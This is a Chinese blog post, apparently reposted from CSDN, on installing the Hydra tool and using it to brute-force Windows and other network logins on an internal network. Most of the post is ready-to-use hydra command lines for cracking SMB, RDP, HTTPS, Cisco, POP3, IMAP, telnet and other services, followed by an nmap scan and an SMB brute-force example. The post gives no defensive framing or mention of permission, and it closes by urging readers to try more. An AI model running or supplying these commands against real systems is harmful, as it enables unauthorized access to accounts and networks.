利用hydra(九头蛇)暴力破解内网windows登录密码
https://blog.csdn.net/weixin_37361758/article/details/77939070
尝试了下 能够进行smb的破解 但是rdp的总是失败. 很奇怪. 使用的命令是
windows 平台. hydra.exe -l administrator -P pass.txt -V 10.24.101.1 smb
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/weixin_37361758/article/details/77939070
一.安装相关依赖包
Ubuntu/Debian
执行命令:apt-get install libssl-dev libssh-dev libidn11-dev libpcre3-dev libgtk2.0-dev libmysqlclient-dev libpq-dev libsvn-dev firebird2.1-dev libncp-dev libncurses5-dev hydra
Debian和Ubuntu发行版,源里自带hydra,直接用apt-get在线安装。
Redhat/Fedora
执行命令:yum install openssl-devel pcre-devel ncpfs-devel postgresql-devel libssh-devel subversion-devel libncurses-devel
OpenSuSE
执行命令zypper install libopenssl-devel pcre-devel libidn-devel ncpfs-devel libssh-devel postgresql-devel subversion-devel libncurses-devel
二.Hydra源代码安装
wget http://www.thc.org/releases/hydra-7.4.1.tar.gz
tar zxvf hydra-7.4.1.tar.gz
cd hydra-7.4.1
./configure
make && make install
破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
破解teamspeak:
hydra -l 用户名 -P 密码字典 -s 端口号 -vV ip teamspeak
破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable
破解smb:
hydra -l administrator -P pass.txt ip smb
破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3
破解rdp:
hydra -L users.txt -P pass.txt -V ip rdp
破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18
破解imap:
hydra -L user.txt -p secret 10.36.16.18 imap PLAIN
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN
破解telnet
hydra ip telnet -l 用户 -P 密码字典 -t 32 -s 23 -e ns -f -V
示例:
扫描开放端口 nmap -p 192.168.1.114 我这边有一个445端口是开放的
利用九头蛇开始暴力破解 hydra -l whoami -P /root/6666shuzi.txt smb://192.168.1.114
这里只是简单的利用 , 更多暴力破解 需要自己去尝试, 当然暴力破解需要一定时间,破解的力度取决于你字典的厚度。